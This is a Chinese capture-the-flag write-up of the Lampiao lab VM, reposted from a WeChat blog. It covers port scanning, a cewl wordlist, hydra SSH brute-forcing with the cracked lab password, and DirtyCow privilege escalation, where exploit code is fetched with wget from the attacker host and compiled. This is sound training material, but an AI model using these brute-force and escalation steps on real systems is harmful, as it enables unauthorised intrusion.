cewl爬取+dirtycow提权:Lampiao靶机

admin 2024年4月14日18:31:40评论6 views字数 777阅读2分35秒阅读模式

特色:一是用cewl爬取页面关键词作为字典,爆破;二是dritycow这个大杀器直接提权秒杀;三是这几个靶机都用到exploit-db和searchsploit来查询漏洞。

上篇,孙老师指出了那个hash是sha256,并不是我认为的md5的64位,暴露出了我对这些理解不深不透,还是要加强学习与领悟,三人行必有我师焉。

一、扫描

1、靶机ip:192.168.137.132

2、端口:22、80、1898

cewl爬取+dirtycow提权:Lampiao靶机

3、访问80没什么,访问1898出来个登录窗口,点击read more出来了url

cewl爬取+dirtycow提权:Lampiao靶机

切换下node/2之类的

cewl爬取+dirtycow提权:Lampiao靶机

4、语音和二唯码

提示:user:tiago

http://192.168.137.132:1898/qrc.png

扫描二唯码,没什么用

二、爆破

1、爬取关键词作字典

cewl http://192.168.137.132:1898/?q=node/1 -w dayu.txt

cewl爬取+dirtycow提权:Lampiao靶机

2、爆破ssh

hydra -l tiago -P dayu.txt 192.168.137.132 ssh

cewl爬取+dirtycow提权:Lampiao靶机

用户名:tiago,密码:Virgulino

3、ssh登录

cewl爬取+dirtycow提权:Lampiao靶机

4、网站用的cms?

用dirb跑目录,老是报错

cewl爬取+dirtycow提权:Lampiao靶机

查看了源码,发现是 Drupal 7

cewl爬取+dirtycow提权:Lampiao靶机

三、提权

1、搜索Drupal7漏洞提权,都提到“脏牛”

cewl爬取+dirtycow提权:Lampiao靶机

提到了用40847.cpp,复制到本地

cewl爬取+dirtycow提权:Lampiao靶机

2、传到靶机

python -m http.server 9966

wget http://192.168.137.128:9966/40847.cpp

3、编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

含义如下:

cewl爬取+dirtycow提权:Lampiao靶机

4、提权

cewl爬取+dirtycow提权:Lampiao靶机

cewl爬取+dirtycow提权:Lampiao靶机

四、完结

cewl爬取+dirtycow提权:Lampiao靶机

原文始发于微信公众号(MicroPest):cewl爬取+dirtycow提权:Lampiao靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月14日18:31:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cewl爬取+dirtycow提权:Lampiao靶机http://cn-sec.com/archives/2656279.html

发表评论

匿名网友 填写信息